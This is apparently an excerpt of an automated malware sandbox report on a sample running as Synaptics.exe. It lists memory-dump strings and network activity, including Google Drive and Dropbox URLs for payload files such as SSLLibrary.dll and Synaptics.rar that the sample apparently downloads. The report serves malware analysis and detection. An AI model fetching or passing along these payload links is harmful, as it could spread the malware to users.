                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2143102591.0000000004FDE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2144840252.000000000767E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2147934571.00000000097BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2144782532.000000000753E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2141922978.0000000004B1E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2141457651.0000000002C8E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2148033723.0000000009A3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2147778080.00000000093FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2144725796.00000000073FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2147449211.0000000008C7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2147882709.000000000967E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2144898218.00000000077BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2147175919.000000000863E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2147029511.00000000083BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2147982869.00000000098FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2143160050.000000000511E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2147727813.00000000092BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146977316.000000000827E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000014.00000002.2146920870.000000000813E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq&&
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq4
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq8
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq8b
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqV
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqx
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr1
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr?g
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadra.Q
                              Source: Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadra_
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadroid.
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrse
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrvice
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads-X
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads;d
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadservi-
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsg
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2018131759.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976029257.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C72000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt#r_
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.cn
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt9a
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadta
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleniyor...
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadty
                              Source: Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadugW
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurity
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurity;
                              Source: Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvP
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvine.
                              Source: Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw#
                              Source: Synaptics.exe, 00000014.00000002.2140164000.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwK~
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwfx
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2018131759.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976029257.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx/
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxSs
                              Source: Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady1
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady?j
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyQ
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyfS
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyndic
                              Source: Synaptics.exe, 00000003.00000003.1316708703.0000000005406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyoutu
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyoutuT/
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzV
                              Source: Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~;k
                              Source: Synaptics.exe, 00000003.00000002.1441338159.000000000063D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~sD
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: ~$cache1.20.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                              Source: Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/6
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/PIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/dow
                              Source: Synaptics.exe, 00000003.00000003.1316708703.0000000005415000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=d
                              Source: Synaptics.exe, 00000014.00000002.2140164000.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000014.00000002.2140164000.00000000007DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000014.00000002.2140164000.00000000007DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000014.00000002.2140164000.00000000007DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000003.00000002.1445445710.00000000071B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.00000000071B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg14
                              Source: Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg14-
                              Source: Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg14c
                              Source: Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/lesa
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/mppr
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                              Source: ~$cache1.20.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: ~$cache1.20.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlH
                              Source: ~$cache1.20.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
